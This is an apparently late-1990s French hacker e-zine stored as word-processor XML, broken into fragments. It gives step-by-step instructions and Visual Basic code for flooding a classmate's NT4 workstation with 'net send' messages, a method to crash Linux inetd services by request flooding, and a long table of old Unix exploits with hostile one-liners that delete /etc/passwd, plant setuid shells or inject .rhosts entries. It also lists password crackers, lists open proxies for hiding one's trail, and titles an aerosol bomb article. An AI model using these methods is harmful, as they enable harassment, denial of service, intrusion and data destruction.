          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment pirater des sites web/des serveurs,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45 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Hunt: technique de détournement de paquets en réseau,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46 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>A l'aube du nouveau millénaire,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47 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>, par Clad Strif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48 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Regl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rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">| 10.49 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment introduire un fichier dans le systeme informatique de votre école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10.50 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bombe aérosol, par |Wu-TaNG| et WeEdMaN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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Conclusion                                                                                   |</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________|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9372" w:leader="none"/>
          <w:tab w:val="left" w:pos="9514" w:leader="none"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10082" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-13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___________________________________________________________________________))==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Les réseaux Internet-Hdynet, par Dead Lu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 premier jours, de gros problèmes sont survenus et l'accès au résea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était impossible.   L'eternet inter-tente a eu du mal à démarr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ers la fin de l'après midi du Mercredi, le reseau Internet éta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ccessible par les PC dédiés … la connections IP mais privés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ame Server, beaucoup d'utilisateurs se sont retrouvé le bec da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a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uis au fur et  mesure, le réseau s'est totalement connecté grace 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énergie considérable déployée par l'équipe réseau.  Une fois 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roblèmes de réseau résolue l'accès … l'Internet devint tota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ULL IP: telnet, ftp, gopher, news, mail, IRC---donc le hack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Jenov  fut  certainement  la  machine la plus utilisée de tout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ngrès avec son accès Guest.  Malheuresement, quelqu'un n'ay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isiblement pas l'esprit d'un hacker mit un mot de passe sur gu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genant de ce fait tout le monde.  Mais cela fut vite résolu pa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équipe résea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k...voici le Plan du réseau:...(si vous etes assez intelligent pour comprend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ab/>
        <w:t xml:space="preserve">  Hdyn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________     SLI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XS4ALL   |------------ -/`   INTER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         `\ (accès TCP/I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SLIP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 SLIP                      | SLI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____|___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t;réseau .34\______|HdyNET|/      ./\/\/\/\/\.          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t;"serveurs"/</w:t>
        <w:tab/>
        <w:t xml:space="preserve">      |  GW       |-------[réseau .33]-|Hdy W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 xml:space="preserve">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b/>
        <w:tab/>
        <w:t xml:space="preserve">      [ réseau .35]                       [réseau .32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field"   ]                       [   "Hal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b/>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j'espere vs etes assez intellingent pour savoir de koi je parle...si vous le savez pas..ben c po mon problem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lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Fun sous réseau NT 4.0(testé sous SP3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>, par Flamboy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lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>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Bon, vous avez un réseau NT4 à l'école pis vos cours sont plates???</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Voici un moyen pour faire phreaker mais vraiment PHREAKER les autres....</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bon vous commencez par aller sous dos. Vous tapez ensuite la command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hostname . Ca va vous donner votre nom de poste.  Ensuite tapez</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net send hostname "votre message"  où hostname représente la réponse obtenu par la commande hostname.  Bon si ca ca marche le service send est lancer et vous allez vous amuser.....Voilà ce qu'il faut faire: 1- Allez sur l'ordinateur de l'autre pis tapez hostname pour être bien sur de connaitre le hostname de la victime.  2-Ensuite aller sous Visual Basic et créer un timer, puis mettez 100 comme interval.  3-Dble-Cliquer sur le timer et mettez ce cod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rivate Sub Timer1_Timer()</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Shell "net send Hostname votre_messag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End Sub</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hostname=réponse obtenu par la commande hostname sur la machine cibl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votre_message:le message que vous voulez lui envoyer</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le 100 dans interval ca fou que ca exécute le code du timer à chaque 100 milliseconde donc ca envoie 10 message par seconde.  Mais la victime quand elle va cliquer sur ok ben le message suivant va apparaitre pis elle va penser que le message de ferme pas...Conseil ne mettez pas 1 dans interval sinon ca va devenir un self-flood....</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flameboy</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flameboy@cgocable.ca</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-CA"/>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Failles de sécurité, par Clad Strif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mande: inet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ystem affecté: Lin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On peut crasher un serveur Linux qui accepte les connections TCP sous inetd, par flooding de requêtes vers celui-ci. une cinquantaine de requêtes font que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rveur va refuser les connections inetd, parce que le serveur aura crashé. Ca marche pour tous les services sous inetd, donc ftpd, ident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ici une liste de vieux bugs. je ne sais plus ou j'ai trouvée cette liste, en tout cas ce n'est pas moi qui l'ai dressée, ni le gars qui l'a mise à disposi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perating System RVP   Date   Description (Referenc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in/sh              1-- 12/12/94 IFS hole, vi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in/su              1--          overwrite stack someh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v/fb             1--          frame buffer devices readable/writeab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v/kmem       1--          /dev/kmem shold not be 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v/mem         1--          /dev/mem shold not be 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v/*st*, *mt*  1--          generally world readable/writeab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tc                  1--          rexd + MACH ? [NeXT] /etc/ g+w daemo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4.3 Tahoe        1--          chfn -- allows newlines/meta chars/bufsiz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4.3 Tahoe        1--          ttyA&amp;B;A:cat&amp;lt;ttyB;^Z;B:exit;login;A:&amp;;B:pw/uid;A:got p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IX ?              5++          setenv SHELL=/bin/sh; crontab -e; :!/bin/sh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IX 2.2.1        1--          shadow password file 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IX 3.1.5        5--          sendmail- mail to progra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IX 3.2           5--          sendmail- mail to progra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IX 3.2.4        5--          sendmail- mail to progra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IX 3.2.5        5--          sendmail- mail to progra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IX 3.X.X       ???          rlogin localhost -l -froo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IX ?              1--          * password means use root's passwor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IX ?              1--          rexd- any can get root access if enable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mdahl UTS 2.0     1--          NFS mountd only uses hostnam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T&amp;T SVR3.2.0    1--          Bad protected mode allows root if have sh + cc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UX 2.0.1       5--          lpr -s; 1000 calls lpr re-use fnam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UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof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UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof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ellTech SYSV386 1--          ulimit 0; passwd  ==&gt; zero's out passwd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1          1--          Sendmail can mail directly to a fi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1          1--          can mail directly to a fi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1          1--          run set gid program, dump core, is set gi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1          1--          lock- compiled password "hasta la vista", + ^Z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amp;lt;4.2?        1--          IFS w. preserve bug in vi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1          1--          mail directly to a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1          1--          exec sgid program, dump core, core is sgi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1          1--          Sendmail: can mail directly to a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1          1--          lock password "hasta la vista" backdoo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amp;lt;4.2         1--          IFS w/ preserve bug w/vi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amp;lt;4.2         1--          suspend mkdir, ln file you want to di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amp;lt;4.2?       1--          suspend mkdir, ln file you want to di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lock -- compiled in password "hasta la vista"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ln passwd file to mail spool, mail to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can truncate read only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finger "string|/bin/rm -f /etc/passwd"@foo.ba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ln -s target ~/.plan; finger user to read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lpr file; rm file; ln -s /any/filename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adb su; change check in memory; shell ou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race condition, can get root via "a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lock -- compiled in password "hasta la vist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ln passwd file to mail spool, mail use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can truncate read only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finger "string|/bin/rm -f /etc/passwd"@foo.ba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ln -s target ~/.plan; finger use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lpr file; rm file; ln -s /any/filename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adb su; change check in memory; shell out; su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race condition, can get root via "a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dev/kmem and /dev/mem  should not be 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2          1--          signal any process by changing process group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ftp -n; quote user ftp; ect.  Gets root priv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lpd can overwrite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ln -s /any/suid/file -i ; -i Get suid shel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fchown (2) can chown _any_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race condition, get root via "a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passwd chokes on long lines, splits pw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ftp -n; quote user ftp; cd ~root, get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lpd can overwrite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ln -s /any/suid/file -i ; -i Get suid shel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fchown (2) can chown _any_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race condition (expreserve?), root via "a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1--          passwd chokes on long lines, splits pw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4.3          5--          lpr -s; 1000 calls lpr re-use fnam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NET/2        5--          rdist(1) uses popen(3), IFS spoof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NET/2        5--          lpr -s; 1000 calls lpr re-use fnam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            1--          Overwrite gets buffer -- fingerd, et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            1--          uudecode alias can overwrite root/daemon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            1--          /bin/mail ; !/bin/sh    Get uid=bin shel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            1--          rwall bug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            1--          adb the running kernel, shell out and get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            1--          sendmail can mail non-root file, try twic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 ?            1--          rshd -- spoof via nameservice, rsh target -l ui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SD386           1--          mail"&amp;lt;u&gt;;cp /bin/sh /tmp;chmod 6777 /tmp/sh"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uffer overrun   1--          chf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hfn, chsh       1--          used to create a root accoun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hmod            1--          Incorrect file or directory permission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sat           1--          running as root, utmp o+w, writes to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re               1--          will system dump a setgid core imag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code           1--          decode mail alias - write non-root user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llSVR3.2/1.0.6 1--          Bad prot mode allows root if have sh + cc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nial           1--          easy to hog processor, memory, disc, tty, etc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omainO/S &amp;lt;=10.3 1--          break root by using s/rbak; sgid/sui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omainO/S &amp;lt;=10.4 5--          sendmail mail to progra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NS              1--          SOA can control bogus reverse ip, rhost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omain/OS &amp;lt;10.3  1--          break root by using s/rbak; setgid/ui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YNIX 3.0.14     1--          Sendmail -C file  ==&gt; displays any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YNIX 3.?          1--          can get root on NFS host via root via mount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YNIX 3.?          1--          on non-trusted host due to bug in mount daemo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YNIX ?             1--          rsh &amp;lt;host&gt; -l "" &amp;lt;command&gt;   runs as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YNIX ?             1--          login: -r hostnameruser^@luser^@ter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lm              5--          ELM's autoreply can be used to get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xpreserve            1--          can be a huge ho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SIX Rev. D        1--          Bad protected mode allows root if sh+cc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ile mod test          1--          test file doesnt lose the suid when modifie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sck                      1--          lost+found should be mode 700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tpd                      1--          static passwd struct overwrite, wuftp &amp;lt; x.xx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tpd 4.2                1--          userid not reset properly, "user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tpd ?                   1--          core files may contain password info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chown                 1--          test for bad group tes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truncate               1--          can be used to change major/minor on devic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ingerd                  1--          .plan hard-links - read files, finger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gopher                  6--          Type=8 Name=shell Host=;/bin/sh Port= Path=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gnuemacs              1--          emacsclient/server allows access to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GN &amp;lt;1.19         4+-          exec0::/path/prog?var=blah%0Ahack-coomands0%A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DB              1--          nostrangers shell escap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DB              1--          changing the owner of set uid/gid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DB              1--          meta escapes on the X command lin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DB              1--          ; breaks on the X lin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osts.equiv     1--          default + entry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osts.equiv     1--          easy to spoof by bad SOA at remote sit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PUX &amp;lt;7.0        1--          chfn -- allows newlines, etc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P-UX            1--          sendmail:  mail directly to progra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PUX A.09.01     1--          sendmail:  mail directly to progra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PUX ?                1--          Sendmail: versions 1.2&amp;13.1 sm, -oQ &g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DA 1.4.4.1          1--          :include:/some/unreadable/file in ~/.forwar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CMP                   4--          various icmp attacks possib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CMP                   1--          ICMP redirect packets change non-static rout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nteractive 2.x       1--          Bad protected mode allows root if sh+cc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3.3               1--          any user can read any other user's mai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3.3.1       1--          any user can read any other user's mai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3.3/3.31    1--          sendmail- any user can read other user's mai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4.0.X       1--          default suid script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4.0.X       1--          various $PATH proble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4.0.X       1--          sendmail race condition ho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4.0.X       1--          lpd are vulnerable too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rsh &amp;lt;host&gt; -l "" &amp;lt;command&gt;   runs as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login: -r hostnameruser^@luser^@ter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login: -r hostnameruser^@luser^@ter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Overwrite gets buffer -- fingerd, etc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uudecode alias can overwrite root/daemon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bin/mail ; !/bin/sh    Get uid=bin shel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rwall bug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adb the running kernel, shell out and get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mail to any non-root owned file, try twic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rshd- spoof via dns - rsh target -l ui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RIX ?           1--          xwsh log hole? (yo)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kernel           1--          Race conditions coupled with suid progra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ock             1--          4.1bsd version had password "hasta la vista"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ost+found       1--          lost+found should be mode 700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pd              1--          overwrite files with root authority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pr              1--          lpr -r access testing proble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pr              5--          lpr -s; 1000 calls lpr re-use fnam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prm             1--          trusts utmp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ount            1--          "mount" should not be +x for user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queue           1--          must not be mode 777!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ovemail         1--          wor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icroport 3.0    1--          ulimit 0; passwd  ==&gt; zero's out passwd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etwork          1--          BSD network security based on "reserved port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ews             1--          news receivers may execute shell command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etwork          1--          kerbero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etwork          1--          Networks are usually very insecur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FS              1--          Many systems can be compromised with NFS/RPC.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FS              1--          proxy rpc can read remote nfs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FS              1--          can generate NFS file hand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FS              1--          mount disk, make cd .. and no restricted directori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SF/1 1.2        1--          write allows shell outs to gain egid ter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SF/1 1.3        1--          write allows shell outs to gain egid ter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SF/1 1.2        1--          doesn't close the fd to the term writing to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SF/1 1.3        1--          doesn't close the fd to the term writing to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sswd           1--          fgets allows entries mangled into ::0:0:::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sswd           1--          fred:...:...:...:Fred ....Flintstone::/bin/sh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sswd           1--          IDs shouldnt contain: ;~!` M- spoof pope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rtmap          1--          binding proble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oot             1--          ? (fingerd_test.s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cp              1--          nobody proble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exd             1--          existenc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exd             1--          MACH ? [NeXT] /etc/ g+w daemo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dist            1--          buffer overfl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dist            5--          rdist(1) uses popen(3), IFS spoof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ISC/os 4.51?    1--          rsh &amp;lt;host&gt; -l "" &amp;lt;command&gt;   runs as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PC              1--          Many systems can be compromised with NFS/RPC.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wall            1--          running as root, utmp o+w , writes to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CO 3.2v4.2      5--          rdist(1) uses popen(3), IFS spoof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CO ?            1--          rlogin to any acct to trusted host w/o pw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CO ?            1--          rlogin to any acct from trusted host w/o pw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lection_svc    1--          allowed remote access to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amp;lt;x.x    1--          -bt -C/usr/spool/mail/user - reads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amp;lt;5.57   1--          from:&amp;lt;"|/bin/rm /etc/passwd"&gt;  &amp;&amp; bounce mai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amp;lt;=5.61  1--          can mail to any file not root owned, try twic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amp;lt;5.61   1--          sendmail- groups incorrectly, get group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gt;5.65   1--          can get daemon privalages via .forwar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       5++          can mail to programs (sendmal1, nmh, sma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       1--          debug optio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       1--          wizard mod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       1--          TURN command allows mail to be stole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       1--          decode mail alias - write non-root user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       1--          buffer overflow cause sendmail deamon lock up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mail ?       1--          what uid does |program run with?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GNALS          1--          signal any process by changing process group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tellix 2.0?     1--          rsh &amp;lt;host&gt; -l "" &amp;lt;command&gt;   runs as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tellix 2.0      1--          rsh &amp;lt;host&gt; -l "" &amp;lt;command&gt;   runs as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tellix 2.1      1--          login: -r hostnameruser^@luser^@ter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id             1--          will run .profile if linked to - , IF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id             1--          never call system(3) and popen(3)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id             1--          May not expect filesize signals, SIGALR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id             1--          no setuid program on a mountable disk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id             1--          ro mounting of foreign disk may allow sui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id             1--          .plan link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id             1--          /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh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3.3        1--          ftpd - userid not reset properly, "user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3.5        1--          connect w/acct;user root;ls;put /tmp/f/ tmp/b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amp;lt;4.0       1--          sunview - any user can read any remote fi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amp;lt;4.0       1--          any user can run yp serve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        1--          chsh -- similar to chf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386i       1--          rm logintool, hack login with adb, chmod 2750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386i/4.01? 1--          login -n root requires no passwor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386i/4.01? 1--          login -n root (no passwor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1      1--          chfn buffer proble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1      1--          chsh buffer problem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1      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machin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3      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machin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3      1--          concurrent yppasswd sessions can trash yp map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3      1--          mail to any non-root owned file, try twic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3      1--          rcp buffer overfl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3      1--          sendmail- mail to non-root file, try twic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3      1--          ttyA&amp;B;A:cat&amp;lt;ttyB;^Z;B:exit;login;A:&amp;;B:pw/uid;A:gets P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3      1--          uucico can show ph num, login, passwd, on remote machin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3      1--          ypserv sends maps to anyone w/ domain (ypsnarf)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      1--          anyone can restore a file over any other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      1--          chfn -- allows newlines, meta chars, bufsize proble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      1--          rcp with uid -2; only from PC/NF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      1--          ln -s /any/suid/file -i ; -i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0.?      1--          selection_svc can remotely grab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1        1--          rshd: spoof via nameservice, rsh target -l ui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1        1--          shared libs accept relative paths w/ sui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1        1--          sendmail: groups incorrectly checked, can get any group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1        1--          comsat can overwrite any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1.x      1--          comsat can overwrite any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1.x      1--          ptrace allows to become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1.x      1--          openlook: telnet 2000; executive,x3, run ps in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amp;lt;4.1.1     5--          lpr -s; 1000 calls lpr re-use fnam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4.1.2      5--          rdist(1) uses popen(3), IFS spoof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usr/kvm/crash allows sh escapes group kme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ttyA&amp;B;A:cat&amp;lt;ttyB;^Z;B:exit;login;A:&amp;;B:pw/uid;A:gets PW()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dev/kmem and /dev/mem should not be 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rshd -- spoof via nameservice, rsh target -l ui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ftp -n; quote user ftp; ect.  Gets root priv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symlink .plan to target file, finger user to rea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Overwrite gets buffer -- fingerd, etc.  (3.5)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rwall bug (&amp;lt;= 4.01 y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ptrace allows to become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4--          icmp errors not handled correctly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adb the running kernel, shell out and get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ftp -n; quote user ftp; ect Gets root priv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lpd can overwrite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the window manager can be used to read any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rexd -- any can get root access if enable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emacsclient/server allows access to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          1--          openlook; telnet port 2000; executive,x3, runs PS inter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US ?          1--          devinfo can be used to get group kme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nOS 5.1        1--          Symlinks are broke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yslogd          6--          buffer overrun, allows remote acces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yslogd          1--          syslog messages used to overwrite any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ystem           1--          system(3) even w/ setuid(getuid()) = IF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YSV &amp;lt;R4         1--          write to files; race condition w/ mkdir &amp; l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YSV &amp;lt;R4         1--          expreserve problem/race conditio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YSV R?          1--          IFS, other environment at "login:" promp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cp/ip           1--          sequence number prediction allows spoofing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cp/ip           1--          source routing make host spoofing easie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cp/ip           1--          rip allows one to capture traffic more easily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cp/ip           4--          various icmp attacks possib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ftp             1--          puts/gets -- grab files, do ch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raceroute       1--          allow one to easily dump packets onto ne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imit           1--          passwd(1) leaves passwd locked if ulimit se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2.0?      1--          sendmail- 1.2&amp;13.1 sm, -oQ &gt; can r/w any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2.0?      1--          Sendmail -C file  ==&gt; displays any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2.2?      1--          Sendmail -C file  ==&gt; displays any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2.2       1--          ln passwd file to mail spool, mail to use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2.2       1--          on a non-trusted host due to bug in mount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2.2       1--          Sendmail: -C file  ==&gt; displays any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2.2       1--          can get root on NFS host via root via mount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2.2       1--          get root on host running NFS from other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3.0       1--          lock -- compiled in password "hasta la vista"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3.0       1--          login -P progname allows run programs as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3.0       1--          login can run any program with root priv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3.0       1--          ln -s target ~/.plan; finger user to acces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3.0       1--          any user can mount any filesyste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3.0       1--          X11 doesn't clear pwds in mem; /dev/mem is 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amp;lt;3.1      1--          limit file 0; passwd --&gt;zero's out passwd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amp;lt;3.1      1--          lpd can overwrite any file (back to 2.0?)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3.1?      1--          rshd: spoof via nameservice, rsh target -l ui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3.1?      1--          allows newlines, meta chars, buffsize proble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amp;lt;4.1      1--          overflow RISC reg buffer, get root w/ mai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rshd -- spoof via dns, rsh target -l uid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ypbind takes ypset from all; spoof yp DB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yppasswd leaves yp data files world writab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chfn -- allows newlines, meta chars, bufsiz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ftp -n; quote user ftp; ect Gets root priv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can change host name, mount any filesystem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uudecode alias can overwrite root/daemon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4--          ICMP not handled correctly (nuk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emacsclient/server allows access to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lock: password "hasta la vista" backdoo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dev/kmem and /dev/mem should not be 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ltrix ?         1--          can change physical ethernet addres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NIX             1--          / must not be go+w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tmp             1--          etc/utmp o+w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tmp             1--          check to see if world writeable (rwall, comsa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tmp             1--          syslog messages can overwrite any fi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ucp             1--          check valid UUCP akts in the /etc/ftpuser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ucp             1--          echo "myhost myname"&gt;x;uucp x ~uucp/.rhost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ucp             1--          uucico shows ph num, login, passwd, of remot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udecode         1--          if it is setuid, may create setuid fil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usend           1--          uusend may call "uux" while suid to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ux              1--          uusend may call "uux" while suid to roo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11R?            1--          snoop on keyboards and bitmap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11R3            1--          can set log on and exec (fixed in "fix-6")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11R4            1--          can set log on and exec (fixed in "fix-6")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11R ?           1--          snoop on keyboards and bitmap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11R5            5++          xterm can create files (xterm1__)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host            1--          if + , anyone can connect to X server ()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ypbind           1--          accepts ypset from anyone ()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Hades, Cracker jack...: les perçeurs de mots de passe, par Clad Strif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mme vous l'avez deviné cet article parlera de perçeurs de mots de apsse pour les stations UNIX/Linux uniquement. Il n'y a pas de réel intérêt à faire ça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s ordinbateurs sous Windows: en effet, à partir du moment ou vous avez un accès utilisateur reconnu sur la machine, vous avez accès au réseau, et les privil_g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mposés sont les même sauf en cas de sessions administrateurs gérés par des programmes tel KeiiWin. Seulement ces statuts sont TRES facile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omprommetables (expliqué dans les zines précédents): par exemple effacer le fichier pwl permet de rassaisir le mot de pass de session de l'utilisateur à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rrespondait le fichier pw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Un perçeur de mot de passe est prévu pour décrypter un password cérypté par un algorithme. Actuellement les algorithmes de cryptage sont si puissants qu'i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vient impossible d'en trouver le chemin de décryptage du mot de passe. Alors il y a des programmes qui vont se charger de trouver le password en le fais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psser par l'algorithme de cryptage. Cette méthode est aussi connue sous le nom de: "Brute Force Hackin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a plupart de ces mots de passes marchent en testant les mots de passe d'un "dico". Ce "dico" correspond à une liste de mot, qui est prévu pour tester chaque mo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me password un par un. Quelques dicos sont trouvables sur hackers.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autres crackers de mots de passes auront la tâche de décrypter le mot de passe. En général ces programmes ont déjà des clés de cryptages pour décrypter d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sses encryptés avec certains programmes (exemple: le programme X décryptera le pass Y du programme A, mais pas le pass Z car il n'a pas été crypté avec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rogramme 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Je vous donne une liste de quelques crackers de mots de passe trouvables sur inter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Unsecu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Vcrack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CrackerJa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EntryPRO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Ftp-H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Had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l0pht Cra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DEP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Unsecure: c'est un passcracker pour FTP, il peut faire de la recherche par dictionnaires, ou bien créer lui même ses mo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VcrackFTP: c'est l'un des passcrackers FTP les plus connus: car simple d'utilisation, mais il reste assez lent et peut aboutir à des plantag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rackerJack: il fonctionne sous DOS et permet de cracker les passwords sous UNIX. A noter que Jill est un add-on pour cracker Jack qui permet u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recherche plus approfondie des mots de pas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ntryPRO: il permet de cracker les mots de apsse de sites web, lorsqu'une fenêtre password s'ouvre comme c'est souvent le cas sur les sites pornos.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lus d'informations à ce sujet: http://web.idirect.com/~elitesy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FTP-Hck: rien à di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Hades: Hades est un cracker de mots de passe Unix sous etc/passwd. Attention (je préviens les newbies: il s'agit d'un cracker qui marche quand on est sur u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tation UNIX, on peut pas cracker des pass UNIX avec Hades à distance. Bref, si vous comptiez vous farcir 2 ou 3 serveurs avec ce apsscrackers, diso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que c'est raté). Hades fonctionne par recherche de mots dans dictionnaires, ou bien il créé des combinaisons de mots de A à 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0phtCrack: il s'agit d'un perceur de mots de passe pour stations NT. Il est tellement rapide que il peut vérifier les mots de passes de centaines d'utilisateu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avec des centaines de milliers de mots inscrits dans les dicos en quelques minutes uniquement. http://www.l0pht.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PL: Delam Elite Password Leecher. Conçu en 1991, son auteur dit de lui qu'il est le moyen le plus simple et actuellement le plus sophistiqué de trouver des</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asswords, des fichiers auquels vous n'avez pas accès, etc... (C'était en 1991). Fonctionne sous DOS.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Proxys: changer de proxy ou en mettre un ça sert à quoi?, par Clad Strif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On croise sans cesse des textes fournissant des listes de proxys. Une rumeur bien con s'est fondé sur les proxys: on s'imagine actuellement (surtout les lame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un proxy eprmet de se spoof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xplications techniques lorsqu'une liaison s'établit vers un serveur dist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Une connexion s'établit toujours de client vers serveur. Chaque connection est bi-directionnelle. Lorsqu'une demande de connection est lancée vers un serveur,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rveur répond avec son autorisation ou non, et une demande de connection sur vous. Puis encore une requête pour commencer l'échange de packets est envoyé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ers le serveur. Pour établir une connection qui marche, et pas du pipeau, le serveur doit se connecter à vous (adresse phisyqes, internets...). passer par un proxy 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hange rien au fait que vous utilisez toujours le même ISP, et donc avez toujours une IP founie par cet ISP. Le proxy peut à la limite servir de firewall (filtrage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ckets entrant ou sortant selon sa configuration), donc un internaute pourrait ne pas réussir à vous tracer ou vous pinger. Mais celà ne change rien. Le seul problè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sécurité que pose ainsi un proxy est, qu'en passant à travers plusieurs proxys (il suffit d'établir des connections en reconfigurant le nécessaire), si l'on cherche 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retracer, celà deviendrait difficile mais pas impossib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iste de proxys tirée de Hackoff18, qui est elle même tirée d'ils ne savent trop où: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de  Fournisseur URL Port Protoco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E  Emirates.Net proxy.emirates.net.ae/proxy.pac -  AUTOCONFI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R  Broggio gopher.broggio.com.ar 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T  Tecan www-proxy.tecan.co.at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U  TAS www2.transport.tas.gov.au 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U  Schools proxy.schools.net.au 3128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R  CTelecom proxy.cybertelecom.com.br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R  Overnet vectra.overnet.com.br 3128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A  Csjlor www.csjlor.qc.ca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A  Clasalle acces.clasalle.qc.ca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H  Cern web-cache-2.cern.ch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H  UniSg sigma.unisg.ch 3128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  Compunet proxy.compunet.net.co 3128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Z  Cuni hamster.ms.mff.cuni.cz 8080  HTTP/FTP GOPHER / WAIS SECURITY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Z  Vutbr lyn.zlin.vutbr.cz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  RR proxye1-atm.maine.rr.com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  McMail proxy.mcmail.com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  Ludexpress yogsothoth.ludexpress.com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HtwkL zeus.rz.htwk-leipzig.de 80  HTTP/FTP 